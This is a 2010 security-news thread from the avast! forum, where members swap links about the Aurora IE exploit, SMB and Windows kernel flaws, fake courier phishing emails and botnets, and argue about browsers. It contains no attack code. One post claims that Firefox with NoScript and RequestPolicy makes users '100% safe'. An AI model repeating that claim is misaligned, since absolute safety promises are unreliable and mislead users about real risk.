Anything on The Register is just there for sensationalism and media hype Microsoft's Jerry Bryant said the company is still working on a fix for the SMB flaw and is not aware of any in-the-wild attacks that target the weakness.
'Anything' in this sense would suggest everything put out by The Register is hype which is plainly not true.
But I get your point YoKenny. I get The Register, and it is most times sensation hard sell that is nonetheless most times accurate enough (give or take some occasional near misses). And heaps less bundled with the soft bloat / hard sell that epitomizes many of the other publications that make up my tech feeds.
Notably, each page is a clean page - you can go to the previously viewed page without having to first negotiate a pile of hidden iframes.
-
Hi YoKenny and mkis,
Hackers may use the exploit to crash Windows. “We are developing an update to solve this problem”, according to Bryant on his blog. The old workaround, shutting down ports 139 and 445, (use the wwdc tool) is the only possibility so-far to keep the OS secure against this denial-of-service-attack.
nCircle main spokesman Andrew Storms commented, that he had expected the SMB-problem to be patched this month, if only as a PR-thing.
“On the other hand it is to be understood that MS did not, because it is "only" just a DoS-attack.” The main issue SMBv2 was patched with http://www.microsoft.com/technet/security/bulletin/ms09-050.mspx
during October last; the issue that still remains unpatched is this: http://www.microsoft.com/technet/security/advisory/977544.mspx
So if not paying attention users will mix things up... but Microsoft "is concerned that this new report of a vulnerability was not responsibly disclosed, potentially putting computer users at risk." not further commenting on it only criminalizing the disclosure of the vulnerability,
polonus
-
thanks Polonus and mkis ;)
mkis, I see the register exactly how you described it.
Polonus, good job with the additional info, confirming my post.
-
Hi YoKenny and mkis,
Hackers may use the exploit to crash Windows. “We are developing an update to solve this problem”, according to Bryant on his blog. The old workaround, shutting down ports 139 and 445, (use the wwdc tool) is the only possibility so-far to keep the OS secure against this denial-of-service-attack.
nCircle main spokesman Andrew Storms commented, that he had expected the SMB-problem to be patched this month, if only as a PR-thing.
“On the other hand it is to be understood that MS did not, because it is "only" just a DoS-attack.” The main issue SMBv2 was patched with http://www.microsoft.com/technet/security/bulletin/ms09-050.mspx
during October last; the issue that still remains unpatched is this: http://www.microsoft.com/technet/security/advisory/977544.mspx
So if not paying attention users will mix things up... but Microsoft "is concerned that this new report of a vulnerability was not responsibly disclosed, potentially putting computer users at risk." not further commenting on it only criminalizing the disclosure of the vulnerability,
polonus
Yes I think the security issue at the moment http://secunia.com/advisories/cve_reference/CVE-2009-3103/
with the Microsoft thing as well http://www.microsoft.com/technet/security/advisory/977544.mspx and at the same time people getting infected
I've been picking up bits and pieces on the forum now and then but not really much up with the play. Makes interesting reading though. Lots to be learned amongst this lot.
-
and siszyd32.exe :o :o :o
-
You need to modify your link as all it does is take you to the search function, not display any results if that was your aim.
-
There is a safe way to browse and not worry about these security warnings.
http://forum.avast.com/index.php?topic=19387.msg441269#msg441269 (http://forum.avast.com/index.php?topic=19387.msg441269#msg441269)
While I'm on this OS, I don't think I have anything to fear even without any Anti Virus protection. :)
-
You need to modify your link as all it does is take you to the search function, not display any results if that was your aim.
okay I see what you mean, meant to be search for siszyd32.exe under virus and worms. Just back on internet. I will delete link since we all know how to get there.
-
Chrome Sets Browser Security Standard, Says Expert
http://www.pcworld.com/article/186486/chrome_sets_browser_security_standard_says_expert.html
-
Firm to Release Database & Web Server 0days
http://www.krebsonsecurity.com/2010/01/firm-to-release-database-web-server-0days/
Jan 10, 2010: Regarding responsible disclosure
http://intevydis.blogspot.com/2010/01/jan-10-2010-regarding-responsible.html
Sun Directory Server 7.0 core_get_proxyauth_dn DoS
http://intevydis.blogspot.com/2010/01/sun-directory-server-70.html
-
Chrome Sets Browser Security Standard, Says Expert
http://www.pcworld.com/article/186486/chrome_sets_browser_security_standard_says_expert.html
Have a look at Some Observations on Rootkits:
http://blogs.technet.com/mmpc/archive/2010/01/07/some-observations-on-rootkits.aspx
Where it says at the bottom• Run 64-bit Windows
for the time being, it appears that currently, users running 64 bit Windows are less likely to be compromised by rootkits. While the threat landscape is constantly evolving, for now you can breathe a lot easier if you're running 64-bit Windows. If you have a choice, go with 64-bit.
I won't be switching to Chrome. 8)
Did you catch The Simpsons 20th Anniversary Special?
http://www.associatedcontent.com/article/2576391/the_simpsons_20th_anniversary_special.html
-
Have a look at Some Observations on Rootkits:
http://blogs.technet.com/mmpc/archive/2010/01/07/some-observations-on-rootkits.aspx
Where it says at the bottom• Run 64-bit Windows
for the time being, it appears that currently, users running 64 bit Windows are less likely to be compromised by rootkits. While the threat landscape is constantly evolving, for now you can breathe a lot easier if you're running 64-bit Windows. If you have a choice, go with 64-bit.
I won't be switching to Chrome. 8)
Super technet article :D
Can you elaborate on how relates to Chrome specifically?
-
Have a look at Some Observations on Rootkits:
http://blogs.technet.com/mmpc/archive/2010/01/07/some-observations-on-rootkits.aspx
Where it says at the bottom• Run 64-bit Windows
for the time being, it appears that currently, users running 64 bit Windows are less likely to be compromised by rootkits. While the threat landscape is constantly evolving, for now you can breathe a lot easier if you're running 64-bit Windows. If you have a choice, go with 64-bit.
I won't be switching to Chrome. 8)
Super technet article :D
Can you elaborate on how relates to Chrome specifically?
that was my reaction too ;) Yokenny has the ability to link unrelated things very often so don't worry. The "thinking" here is because he's running a 64 bit version of Windows and IE8 he feels safe enough against rootkit not to have to use Chrome and its sandboxing abilities. Doesn't make any sense but that's Yokenny... :D
-
I think the main issue with Chrome is still the privacy issue - collecting client server data, say, with localisation strategies and other personalization, or through google diagnose, an so on.
So far anyway.
Rootkits are another matter though. deserving of greater attention, so it seems from recent developments.
-
Hi mkis,
We can do something about that with silentio -
silentio! - anonymize your Google™ Chrome Browser!
Save your own privacy with opwoco silentio!
Feel free to spread it! http://www.opwoco.com/silentio/
opwoco security solutions
Bröckers & Wesseling GbR
Wieferthook 29
48599 Gronau-Epe
Germany
polonus
-
Hi Polonus,
I'm rerouted to https://www.opwoco.de/ which shouldn't be an issue but I cannot find "silentio" there...
-
Hi Logos,
Maybe it was removed from the developer site on demand,
Here is an alternative downloadsite:
Checking: http://wakoopa.com/download/silentio/1.0.0.0
Engine version: 5.0.1.12222
Total virus-finding records: 933762
File size: 11.62 KB
File MD5: 7eaf73e43dc1d2da525869b9159a9373
http://wakoopa.com/download/silentio/1.0.0.0 - archive HTML
>http://wakoopa.com/download/silentio/1.0.0.0/Script.0 - Ok
>http://wakoopa.com/download/silentio/1.0.0.0/Script.1 - Ok
http://wakoopa.com/download/silentio/1.0.0.0 - Ok
polonus
-
@ Polonus: thanks ;)
edit: I either get a page not found or registration required...nevermind.
-
Have a look at Some Observations on Rootkits:
http://blogs.technet.com/mmpc/archive/2010/01/07/some-observations-on-rootkits.aspx
Where it says at the bottom• Run 64-bit Windows
for the time being, it appears that currently, users running 64 bit Windows are less likely to be compromised by rootkits. While the threat landscape is constantly evolving, for now you can breathe a lot easier if you're running 64-bit Windows. If you have a choice, go with 64-bit.
I won't be switching to Chrome. 8)
Super technet article :D
Can you elaborate on how relates to Chrome specifically?
that was my reaction too ;) Yokenny has the ability to link unrelated things very often so don't worry. The "thinking" here is because he's running a 64 bit version of Windows and IE8 he feels safe enough against rootkit not to have to use Chrome and its sandboxing abilities. Doesn't make any sense but that's Yokenny... :D
I like to keep things simple.
I do not need Chrome.
Everything should be as simple as it is, but not simpler.
Any intelligent fool can make things bigger and more complex... It takes a touch of genius - and a lot of courage to move in the opposite direction.
Only two things are infinite, the universe and human stupidity, and I'm not sure about the former.
Albert Einstein
-
...
Everything should be as simple as it is, but not simpler.
...
The simpler the better
Occam's razor (http://en.wikipedia.org/wiki/Occam%27s_razor)
the principle that "entities must not be multiplied beyond necessity" and the conclusion thereof, that the simplest explanation or strategy tends to be the best one.
-
I find Chrome to be simple that's why I use it. And convenient also.
-
I also like chrome as it is very simple, and I can run it from my meneory stick at school etc. (iron)
but frankly, I am spoilt by firefox, NS etc.... :)
-
I do not need Chrome.
You don't know what your missing. ;D
-
I do not need Chrome.
You don't know what your missing. ;D
How about Browser Defender 8)
-
Wasn't Einstein referring to the solution to quantum theory as being simple, but no simpler?
-
I do not need Chrome.
You don't know what your missing. ;D
How about Browser Defender 8)
I didn't know that was a browser ??? ;D
-
I didn't know that was a browser
I'm pretty sure it isn't. I think he means, the Browser Defender Add-on isn't available for chrome.
-
There is no doubt about YoKenny's capabilities. I for one have learned loads from him on this forum. Nor would I question his integrity - after all, who am I to cast that stone.
I have simply found google browser to be a rewarding experience. This is particularly so in regard to teaching how to use - a couple of directions are all that is needed, and the user is happily away to learn themself the rest. So very good as far as newbs and digitally-challenged people are concerned. They love the New Tab functionality.
This does not mean google would be the best browser in all respects.
-
To mkis, YoKenny, hello 123 and all other psosters in this thread.
Consider this opinion from a browser hacker par excellence and his opinion about the Google Chrome browser, some facts that cannot be easily denied even how hard it may be to realize IE is a years and years old concept that was only uphauled with IE8 not changed, same old wine into a new bag...and so the use of IE6 is still endangering all the users of safer and more secure browsers online....
The new security feature that Google Chrome brings is sandboxing, and this is the prediction about sandboxing in appl. for 2010: http://threatpost.com/en_us/blogs/i-have-only-one-security-prediction-2010-010610
Here GoogleChrome is the browser trendsetter, Fx has landed at separate tab launching only at version 3.7.Drive-by-downloads and malicious e-mail attachments are to-days main threats. This because a malcreant is an opportunist and select the weakest spot in the defense where they can circumvent any firewall. Security is not about SYN packet monitoring, no, the attack surface is minimized by a Fw, it does not do one thing about the desktop that is connected out to the Internet. That makes sandbozing that important, my dear malware fighters, because it seperates supicious data from user's data - it makes the attacker has a more difficult task to perform to succeed. Protected Mode of IE is a right step towards that, but Google Chrome performs much better here, because Google understand that the browser equals the Operational System, that IE = explorer alias browser=system. And using this priciple in a browser they have built from scrap is a gigantec step forward where browser security is concerned. Davi Zovi therefore means GoogleChrome in these respects is the leader of the pack.. http://www.computerworld.com/s/article/9143518/Chrome_sets_browser_security_standard_says_expert The man that earned 10.000 bucks with hacking Safari, means that sandboxing is the answer:
http://cansecwest.com/post/2007-04-20-14:54:00.First_Mac_Hacked_Cancel_Or_Allow
To come up with a patch for every hole found certainly is not the way to go, that is a race that cannot be won,
polonus
-
***
Misplaced warning message at the link below :
http://forum.avast.com/index.php?topic=53353.msg452460#msg452460
***
-
***
Misplaced warning notice :
http://forum.avast.com/index.php?topic=53429.msg453175#msg453175
***
-
Adobe hit by Chinese Google attack
http://www.v3.co.uk/v3/news/2256152/adobe-hit-chinese-google-attack
-
Nice one, I see Adobe are trying to side step the awkward question that it may have been a PDF exploit that lead to the hacking of Google ;D
However, Adobe is remaining pretty tight-lipped over whether the hackers originally tried to gain entry into Google's systems by exploiting a PDF vulnerability.
-
Nice one, I see Adobe are trying to side step the awkward question that it may have been a PDF exploit that lead to the hacking of Google ;D
However, Adobe is remaining pretty tight-lipped over whether the hackers originally tried to gain entry into Google's systems by exploiting a PDF vulnerability.
and now it's two potential intermediary culprit, MS (with IE6) and Adobe Reader :) ... we'll soon talk more about the vectors used than about the hackers behind it ;D
-
New Trojan malware cocktail targets Microsoft Outlook Web Access users
http://www.computerworld.com.au/article/332659/new_trojan_malware_cocktail_targets_microsoft_outlook_web_access_users/
-
FIX for the new IE vulnerability...
Recently a serious hole has been found in Internet Explorer to enable hackers to penetrate corporational networks.
The SANS-institute warns the code is being exploited in the wild:
http://www.dshield.org/diary.html?storyid=8002
One of MS advisories is enabling Data Execution Prevention (DEP) for Internet Explorer. In certain versions DEP is already installed and active, in other it is not. People do not need the FIX when on IE-8 on XP SP3 or Windows Vista SP1 of later versions. The list of vulnerable systems are in the MS list.
A FIX has now been published on the MS site, switching on DEP for IE so the exploit cannot be exploited.
The SANS institute does not expect an out-of-band patch to be launched, but the next round to be enrolled in February. So most sytems may stay vulnerable.
To overcome that time-frame install the FIXFIX. You can find it here:
http://support.microsoft.com/kb/979352
Put the installer onto the desktop and double click to install the FIX. Put the fix as a bookmark inside the browser, because when the patch arrives you can undo the patch coming February,
polonus
-
Thanks so much Polonus for the info. I've patched a few systems using this vital information. Great to see it published here on the avast! forum as well.
-
Google, Citing Attack, Threatens to Exit China
New York Times (http://www.nytimes.com/2010/01/13/world/asia/13beijing.html?hp)
BEIJING — Google said Tuesday that it would stop cooperating with Chinese Internet censorship and consider shutting down its operations in the country altogether, citing assaults from hackers on its computer systems and China’s attempts to “limit free speech on the Web.”
Pop-Up Security Warnings Pose Threats
Federal Bureau of Investigation (http://www.fbi.gov/pressrel/pressrel09/popup121109.htm)
The FBI warned consumers today about an ongoing threat involving pop-up security messages that appear while they are on the Internet. The messages may contain a virus that could harm your computer, cause costly repairs or, even worse, lead to identity theft. The messages contain scareware, fake or rogue anti-virus software that looks authentic.
-
@ .: L' arc :.:
both are old news, the FBI warning from December 11, 2009 , and the undergoing Google vs China story is from January 12...and I started a thread on the 13th:
http://forum.avast.com/index.php?topic=53364.msg452547#msg452547
-
Hi folks,
Demonstration of the Aurora IE Exploit on video:
http://praetorianprefect.com/archives/2010/01/the-aurora-ie-exploit-in-action/
domain names and files to check on for Aurora hack:
http://www.mcafee.com/us/local_content/reports/how_can_u_tell_v5.pdf
extended analysis of the Exploit: http://blog.threatexpert.com/2010/01/trojanhydraq-part-ii.html
Comment shows the effectiveness of social engineering in Exploits:
http://web2.sys-con.com/node/1248613
polonus
-
Hi malware fighters,
Hackers promise the Aurora exploit to work with IE8 and DEP: http://twitter.com/DinoDaiZovi
He also expects to get a functionable exploit for XP and IE8:
The first attack outside the Aurora exploit cycle, was found here:
http://securitylabs.websense.com/content/Blogs/3530.aspx
The site was taken down. The heap spray exploit will be refined,
polonus
-
@ polonus
Any precautionary measure?
-
Hi Chris Thomas,
Not really at the moment. One could upgrade to IE8 according to the MS advice. Security experts say that the exploit can only be prevented through hardware DEP.
So we expect an out-of-band patch before Feb. 9 any moment now, emergency patch imminent:
http://blogs.technet.com/msrc/archive/2010/01/18/advisory-979352-update-for-monday-january-18.aspx
At the moment we have this MS fix to be used temporarily : http://go.microsoft.com/?linkid=9668626
Software DEP is no real DEP, only a form of '/SAFESEH' no effective means to stop this explot, according to MS.
MS security expert Ness remarks that there is a well-known attack that can circumvent DEP via .NET classes. "IE8 does not allow loading these .NET classes in the Internet Zone. In the Intranet zone they are allowed. That is why an attacker that hosts content on a network may circumvent DEP to successfully abuse the hole."
So for the moment refrain of using IE, shun BlueE until patched as many governments now say (Germany, France, Holland), and use Firefox or Flock browser with NoScript and RequestPolicy add-ons installed. Then you are 100% safe,
polonus
P.S. Check if your machine supports hardware DEP? http://support.microsoft.com/kb/912923
D
-
@ polonus
As we’ve previously reported, attacks remain targeted to a very limited number of corporations and are only effective against Internet Explorer 6.
We have not seen successful attacks on Internet Explorer 8. We continue to recommend customers upgrade to Internet Explorer 8 to benefit from the improved security protection it offers.
I am a FUD fighter:
http://en.wiktionary.org/wiki/FUD
-
@ Polonus
Thanks for keeping me updated
I won't be using IE and I have made my security settings very high
-
Hi YoKenny,
Heap spray attacks are no FUD, and why would MS come up with an out of band emergency patch if there was nothing wrong. Why would governments like Germany, France and the Netherlands advise their citizens NOT to use IE for the moment. Just because of what you call FUD. No it is MS that can only secure their software through hardware measurements.
If someone could explain to me why GoogleChrome is better security wise as Firefox, I would drop Firefox every minute. Why IE users cannot come to terms with the idea that their browser has a long, long beard, IE concept is decennia old,
polonus
-
Poisoned PDF pill used to attack US military contractors
http://www.theregister.co.uk/2010/01/18/booby_trapped_pdf_cyber_espionage/
http://www.f-secure.com/weblog/archives/00001859.html
-
D-Link issues fixes for router vulnerabilities
Taiwanese firm says flaw could allow hackers to access administrative settings
http://www.computerworld.com/s/article/9145139/D_Link_issues_fixes_for_router_vulnerabilities?taxonomyId=80
D-Link Routers: One Hack to Own Them All
http://www.sourcesec.com/2010/01/09/d-link-routers-one-hack-to-own-them-all/
-
Akamai: World Internet connection speeds on the rise; Russia, Brazil top cyberattack centers
http://blogs.zdnet.com/BTL/?p=29634
Russia, Brazil Lead Cyber Attack Barrage
http://www.esecurityplanet.com/features/article.php/3858971/From-Russia-With-Spam.htm
-
Super firewall aims to block site swampers
http://www.pcw.co.uk/personal-computer-world/news/2160399/super-firewall-aims-block-dos
Super firewall aims to stop DDOS
http://www.infoworld.com/d/security-central/super-firewall-aims-stop-ddos-401
Welcome to the DIADEM FIREWALL homepage.
http://www.diadem-firewall.org/index.php
pdf
http://www.diadem-firewall.org/documents/Diadem%20Firewall%20-%20D8%20-%20Initial%20Firewall%20Element%20Prototype.pdf
-
Microsoft readies emergency IE patch
The out-of-band update will be released once the company is satisfied that it has been properly tested against all affected versions of Windows. by Ryan Naraine
READ FULL STORY (http://ct.zdnet.com/clicks?t=521872013-98ec0b9bf7e2843a2a0b58f2ad773e46-bf&brand=ZDNET&s=5)
-
Critical out-of-band IE patch coming tomorrow (Jan 21)
http://blogs.zdnet.com/security/?p=5298&tag=nl.e589
-
***
Be on the lookout for email like this example I received today. Do not open it!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
MESSAGE QUARANTINED
Virus Detected: CMU-10739-20100120
Message Details:
From: "DHL Manager Cynthia Estes" <shipping(at)dhl.com>
Subject: DHL Tracking Number 0260151405.
Date: Thu, 21 Jan 2010 10:05:23 +0800
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
***
-
***
Be on the lookout for email like this example I received today. Do not open it!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
MESSAGE QUARANTINED
Virus Detected: CMU-10739-20100120
Message Details:
From: "DHL Manager Cynthia Estes" <shipping(at)dhl.com>
Subject: DHL Tracking Number 0260151405.
Date: Thu, 21 Jan 2010 10:05:23 +0800
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
***
Gmail users are safe, Gmail itself block it and says the reason to block it.
-
Be on the lookout for email like this example I received today. Do not open it!
<snip>
Message Details:
From: "DHL Manager Cynthia Estes" <shipping(at)dhl.com>
Subject: DHL Tracking Number 0260151405.
Date: Thu, 21 Jan 2010 10:05:23 +0800
<snip>
This type of phishing/malicious email has been doing the rounds for well over a year or longer. It just seems the company changes, UPS previously, etc.
-
Yup -- I still see variations (in my ISP's quarantine) supposedly from just about every courier/delivery service around ... UPS, FedEx, Purolator, you name it.
Even if there's no infection in the email itself (or attachments, if any), this is essentially just a new twist on the classic "problem with your account" phishing thing supposed from the bank. Those are really funny, actually, since the vast majority of them are typically from banks you've never dealt with. The rare ones that do claim to be from my bank I'll forward to its security department since the contents seem to indicate familiarity with the bank's online systems.
-
The IE vulnerability has been fixed
Just do a Windows Update
http://news.bbc.co.uk/2/hi/technology/8469632.stm
-
Microsoft Security Advisory (979682) (http://www.microsoft.com/technet/security/advisory/979682.mspx)
Vulnerability in Windows Kernel Could Allow Elevation of Privilege
Note: This only seems to affect 32 bit architecture.
-
Hi bob3160,
About the work-around:
In a posting to a public mailing list, Tavis Ormandy disclosed a zero day privilege escalation vulnerability in the Windows kernel. All versions of Windows, starting with Windows NT 3.1 up to including Windows 7, are affected.
The vulnerability affects support for 16 bit applications. In most cases, it is safe to turn off support for 16 bit applications.
Here are the mitigation instructions (copied from the advisory):
Temporarily disabling the MSDOS and WOWEXEC subsystems will prevent the attack from functioning, as without a process with VdmAllowed, it is not possible to access NtVdmControl() (without SeTcbPrivilege, of course).
The policy template "Windows ComponentsApplication CompatibilityPrevent access to 16-bit applications" may be used within the group policy editor to prevent unprivileged users from executing 16-bit applications. I'm informed this is an officially supported machine configuration.
Administrators unfamiliar with group policy may find the videos below instructive. Further information is available from the Windows Server Group Policy Home
http://technet.microsoft.com/en-us/windowsserver/grouppolicy/default.aspx.
pol
-
Widespread attacks exploit newly patched IE bug
Symantec has seen attacks on hundreds of websites over the past day
http://computerworld.co.nz/news.nsf/scrt/3A4F677083954A91CC2576B300156A8D
-
Widespread attacks exploit newly patched IE bug
Symantec has seen attacks on hundreds of websites over the past day
http://computerworld.co.nz/news.nsf/scrt/3A4F677083954A91CC2576B300156A8D
can't believe it...OK believe it or not this afternoon I was thinking there would possibly be a new bug after this patch, resulting from the patch itself may be ;D :D oh no :o
-
This is for real. It's unbelievable but it's happening. :o
-
UK is world's most popular phishing target
http://www.computing.co.uk/v3/news/2256635/uk-popular-phishing-target
Cardiff tops UK plastic fraud list
Alert Print Post commentEr, in your face, London!
http://www.theregister.co.uk/2010/01/21/uk_plastic_fraud_hotspot/
-
Depressing Analysis Of RockYou Hacked Passwords
http://www.techcrunch.com/2010/01/21/depressing-analysis-of-rockyou-hacked-passwords/
Swedes swap passwords for chocolate treats
http://www.thelocal.se/24486/20100120/
RockYou admits security snafu exposed email login details
http://www.theregister.co.uk/2009/12/17/rockyou_security_snafu/
-
'Cyber Genome Project' kicked off by DARPA
Alert Print Post commentThe code you write - it'll be as traceable as your DNA
http://www.theregister.co.uk/2010/01/26/cyber_genome_project/
False positive.....not only avast:
Kaspersky update slaps Trojan warning on Google Adsense
Alert Print Post commentTsk, you and your false positives
http://www.theregister.co.uk/2010/01/25/kaspersky_adsense_false_positive/
-
***
Another warning for the newbies that might not know better. Notice that it is supposedly from UPS but it is a fake and if opened by the unknowing, you get a virus.
**************************************
EARTHLINK VIRUS BLOCKER MESSAGE STATUS
**************************************
MESSAGE QUARANTINED
Virus Detected: CMU-10763-20100126
Message Details:
From: "UPS Support Jamie Mckinney" <tracking@ups.com>
Subject: UPS Delivery Problem NR 23911.
Date: Tue, 26 Jan 2010 20:04:42 +0200
For your protection, EarthLink Virus Blocker has quarantined a message sent to you because it contains a virus.
***
-
...Another warning for the newbies that might not know better. Notice that it is supposedly from UPS but it is a fake and if opened by the unknowing, you get a virus....
Yes, I got same warning from Gmail, Thanks Google!!, Gmail said it did not load that mail from my Yahoo inbox (POP Access) and leave it in there because of suspicion attachment of that mail.
I download attachment, scanned it and I found this great job from avast! antivirus: http://www.virustotal.com/analisis/a81c322675370b8bfcbc03e012b94b317d3f5a115b820ee04b43bb876ba7226b-1264525820 (http://www.virustotal.com/analisis/a81c322675370b8bfcbc03e012b94b317d3f5a115b820ee04b43bb876ba7226b-1264525820)
Title: Message left on server: "UPS Delivery Problem NR 89904."
The message "UPS Delivery Problem NR 89904." from UPS Support Derrick Zimmerman (tracking [at] ups [dot] com) contained a virus or a suspicious attachment. It was therefore not fetched from your account xxxxxx [at] yahoo.com and has been left on the server.
If you wish to write to UPS, just hit reply and send UPS a message.
Thanks,
The Gmail Team
in the above quote I've edited e-mail addresses
-
Hoaxing Facebook
http://www.norman.com/security_center/blog/snorre_fagerland/77558/en
-
TechCrunch hacked twice in 24 hours
http://www.v3.co.uk/v3/news/2256848/techcrunch-hacked-again
Malware infections double on Web pages
http://www.sfgate.com/cgi-bin/article.cgi?f=/c/a/2010/01/26/BU211BN9KF.DTL
-
Hi malware fighters,
That it is dangerous to leave your desktop unattented, even just for a while, is an open door. See why?
Here: http://ha.ckers.org/blog/20100126/quicky-firefox-bookmarklet-backdoor/
polonus
-
Hi malware fighters,
Spyeye is a hard to detect new bot on the market, costs for cybercriminals 500 euro, was to be used for instance in combination with the Chinese hack toolkit: http://pandalabs.pandasecurity.com/ms10-002-exploit-constructor/
Mentioned bot is a data stealer and invisible in the Windows process list...
http://malwareint.blogspot.com/2010/01/spyeye-new-bot-on-market.html
The malicious bot industry is getting bigger and bigger, and this is an alarming situation, my good friends.
polonus
-
Google Chrome flagged as insecure by Secunia
http://forum.avast.com/index.php?topic=54533.0
-
Hi malware fighters,
The number of botnets that uses HTTP to communicate with infested machines has doubled during the last six months. Traditionally botnets were commanded through Internet Relay Chat (IRC) , but that development has stopped. The number of IRC-based botnets stopped to grow at approx. 400, while HTTP-based botnets grew from 800 to 1600. That growth has to do with the low costs of HTTP-bot-building toolkits, according to Team Cymru, a non-profit anti-cybercrime organisation .
Toolkits
These toolkits are getting more and more functional and the ease to use the HTTP interface will make that botherders has left the IRC-platform as communication channel massively. HTTP botnets are more and more used for Distributed Denial of Service (DDoS)-Attacks. "There are different ways to make money from this kind of attacks, while other alternative use of botnets are to be preferred with less risk."
Most Command & Controle servers, both for IRC and HTTP, are located in the United States of America. Also the North of Europe with the Netherlands, plays an important role. Despite of the fact that IRC-based botnets showed no growth, their number did not go down either. That is why Team Cymru predicts this kind of bots are to play a further role, but the future lies with the HTTP-based bots. Link: http://www.team-cymru.org/ReadingRoom/Whitepapers/2010/developing-botnets.pdf
polonus
P.S. Another fact is HTTP-based bots can be easily relocated...and webadmins have monitored port
6667 while HTTP goes more under the detection-radar. Default and standard IPS/IDS systems just through DPI will filter for "/join"..... and then bye bye botnet. HTTP is more difficult while it looks like legit traffic,
Damian
-
Malware Aims to Evade Windows 7 Safeguards
Windows 7 adds a number of new security features, but social engineering attacks mean that you can’t let your guard down.
http://www.networkworld.com/news/2010/012810-malware-aims-to-evade-windows.html?page=1
-
***
Misplaced warning ...
http://forum.avast.com/index.php?topic=54645.msg462529#msg462529
***
-
Misplaced warning ...
Unfortunately there are many of these still cluttering up the forum. :'(
-
CIA, PayPal under bizarre SSL assault - Plus hundreds of others
http://www.theregister.co.uk/2010/01/29/strange_ssl_web_attack/
-
Hi malware fighter,
Have to post this here as well:
http://forum.avast.com/index.php?topic=54872.0
pol
-
Hi malware fighter,
Have to post this here as well:
http://forum.avast.com/index.php?topic=54872.0
pol
It would take up less Forum real estate if it where only posted here. :)
-
It would take up less Forum real estate if it where only posted here. :)
but, by posting Only here, it would not be easy to 'discuss', with all the different topics it would be confusing, maybe the better solution is open a new room (category) in the forum for these threads.
-
but, by posting Only here, it would not be easy to 'discuss'
exactly, don't know why that needs to be repeated again, it's so obvious that a dedicated thread can't be used for discussion at all. Already nice that those starting new threads still drop a note here as well ;)
-
Consolidating into one thread frees up forum clutter.
Posting here and in it's own thread only causes more clutter.
And why can't it be discussed in this thread ???
-
Consolidating into one thread frees up forum clutter.
Posting here and in it's own thread only causes more clutter.
And why can't it be discussed in this thread ???
discuss in this thread, when ten different sorts of warnings about new web threats are posted everyday, would be the worse mess ever...weren't you the one asking me (kindly ;D ) one day to avoid commenting posts in the "updates" thread, isn't it the same here ???
-
No
-
No
why ?
-
Updates are simply notifications of program updates.
Security warnings sometimes require a discussion.
Just trying to keep the pages from scrolling by.
If it doesn't bother you, then be my guest, post away.
-
Updates are simply notifications of program updates.
Security warnings sometimes require a discussion.
Just trying to keep the pages from scrolling by.
If it doesn't bother you, then be my guest, post away.
thanks ;D But I'd rather stick to what I think is the best, and it seems a few others are sharing my views. I can't seriously imagine a discussion about Chrome last vulnerability, suddenly interrupted by three posts about Adobe Flash, and eventually a new discussion starting in the middle of that. That would drive everyone nuts here. And updates can also be discussed by the way :)
-
What ever makes you happy Boss... ;D
-
thanks ;D But I'd rather stick to what I think is the best, and it seems a few others are sharing my views. I can't seriously imagine a discussion about Chrome last vulnerability, suddenly interrupted by three posts about Adobe Flash, and eventually a new discussion starting in the middle of that. That would drive everyone nuts here. And updates can also be discussed by the way :)
agree!
Bob, Logos said it well, imagine you post a spam warning and I post a warning about a new security hole, others want to talk about spam to you and some other want to talk about that security hole to me, how we can do both together? I don't think opening a new thread bother the site forum resources, but I just think doing that in general forum together with new users question would speed up that category too fast and some questions would move to next page unanswered.
so I think it would be better to have different category in forum home page for that.
-
It isn't site resources but site clutter that concerns me.
At present, I can't keep up with all the posts but as I said before, What ever... ( I'm not a moderator so whatever I or any ofthe others say and do,
really doesn't matter anyway}
-
It isn't site resources but site clutter that concerns me.
At present, I can't keep up with all the posts but as I said before, What ever... ( I'm not a moderator so whatever I or any ofthe others say and do,
really doesn't matter anyway}
Bob, both your age and forum reputation tell me that I must listen to you and do same what you say ;)
and I only told you my own opinion. :)
-
Hi folks,
Opening up this thread was a good idea by Charley's. I fully agree and try to put the various threats I stumble upon linked here. Only thing I find is that sometimes one misses out on some of the issues and topics treated here, just because they are not obvious in sight and that is why a lot of visitors do not see them apparently.....
On the other hand I agree with Logos here that the long topic thread gives less room to discuss a particular topic. That is another point.
The "cluttering and resources take"n is not such a good argument, because I only give a link to click through to read the extensive message in the subject thread that I would have posted anyways. One more link and hi malware fighters... polonus, is not much of eating up resources, well that is m.h.o. and that is why there is different people and different views in this world,
polonus
-
There is a big difference between clutter and resources. One really has nothing to do with the other.
-
Code execution holes in iPhone OS, iPod Touch
Apple has shipped a patch to cover five documented vulnerabilities that expose iPhone and iPod Touch users to malicious hacker attacks
http://blogs.zdnet.com/security/?p=5381&tag=nl.e589
-
Stubborn trojan stashes install file in Windows help
http://www.theregister.co.uk/2010/02/03/help_file_trojan/
Be careful on help files (McAfee Labs Blog)
http://www.avertlabs.com/research/blog/index.php/2010/02/02/be-careful-on-help-files/
-
Most consumers reuse banking passwords on other sites ::)
tell me more about phishing ;D , I mean that's not the same procedure but it just sounds like some people are just asking for it ;D
http://www.theregister.co.uk/2010/02/02/e_banking_password_fail_survey/
-
Use-after-free vulnerability in Adobe
http://www.norman.com/security_center/security_center_archive/2010/77695/no
-
Fake Microsoft Outlook Update Installs Trojan
A malicious spam campaign caught by Panda Labs is using a fake Microsoft Update notice to trick victims into installing a Trojan. While well crafted, the attack still provides dead giveaways.
http://www.networkworld.com/news/2010/020310-fake-microsoft-outlook-update-installs.html?hpg1=bn
-
Fake Firefox site bundles undead adware
http://www.theregister.co.uk/2010/02/03/fake_firefox_download/
Warez backdoor allows hackers to pwn Twitter accounts
http://www.theregister.co.uk/2010/02/03/twitter_phish/
IE Flaw Gives Hackers Access to User Files, Microsoft Says
http://www.pcworld.com/article/188506/ie_flaw_gives_hackers_access_to_user_files_microsoft_says.html
Microsoft confirms new Internet Explorer flaw
http://www.telegraph.co.uk/technology/microsoft/7155664/Microsoft-confirms-new-Internet-Explorer-flaw.html
-
Microsoft confirms new Internet Explorer flaw
http://www.telegraph.co.uk/technology/microsoft/7155664/Microsoft-confirms-new-Internet-Explorer-flaw.html
Microsoft Security Advisory: Vulnerability in Internet Explorer could allow information disclosureMicrosoft has released a Microsoft security advisory about this issue for IT professionals. The security advisory contains additional security-related information. To view the security advisory, visit the following Microsoft Web site:
